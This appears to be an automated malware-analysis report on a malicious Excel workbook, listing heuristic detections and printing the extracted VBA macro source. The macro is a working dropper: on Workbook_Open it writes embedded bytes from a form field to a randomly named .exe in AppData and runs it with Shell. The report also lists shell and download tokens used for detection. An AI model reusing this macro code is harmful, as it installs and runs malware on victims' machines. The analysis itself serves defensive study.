MALICIOUS
136
Risk Score
Heuristics 5
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Call Shell(strProgramName, vbNormalFocus) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
path_file = Environ("AppData") + "\" + path_dom + ".exe"
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2599 bytes |
SHA-256: 448ea6131c8ad6f34c144400b3abf0194a9d5c73641e7a0e6b92510599626008 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub WaitFo(NumOfSeconds As Long)
Dim SngSec As Long
Dim path_dom As String
path_dom = "ddYT4B5RV3DCuu"
SngSec = Timer + NumOfSeconds
Do While Timer < SngSec
DoEvents
Loop
path_dom = "dddYT4B5RV3DCuu"
End Sub
Sub loadPro(strProgramName As String)
Dim path_dom As String
Dim strArgument As String
path_dom = "ddsddYT4B5RV3DCuu%u"
Call Shell(strProgramName, vbNormalFocus)
End Sub
Function ruString(cb As Integer) As String
Randomize
Dim rgch As String
rgch = "ghiabcdefjklqrstuvwmnopxyz"
rgch = rgch & UCase(rgch) & "1348906257"
Dim i As Long
For i = 1 To cb
ruString = ruString & Mid$(rgch, Int(Rnd() * Len(rgch) + 1), 1)
Next
End Function
Sub newLoadr()
Dim row As Long
Dim path_file As String
Dim path_dom As String
path_dom = "YT4B5RV3DC"
path_dom = ruString(6)
path_file = Environ("AppData") + "\" + path_dom + ".exe"
path_dom = "dYT4B5RV3DCu"
Dim ar() As String
If Len(Dir(path_file)) = 0 Then
ar = Split(UserForm1.TextBox1.Text, ",")
path_dom = "dYT4B5RV3DCu"
Open path_file For Binary As #1
Seek #1, LOF(1) + 1
For row = LBound(ar) To UBound(ar)
Put #1, , CByte(ar(row))
Next
Close #1
Call WaitFo(1)
path_dom = "ddsYT4B5RV3DCu"
End If
path_dom = "ddsdYT4B5RV3DCu"
loadPro path_file
Workbooks.Add
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Call newLoadr
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{597548DD-F8CF-452B-802B-65DBD3236851}{BEF5042E-8DC7-47CC-94CC-3194A4611453}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.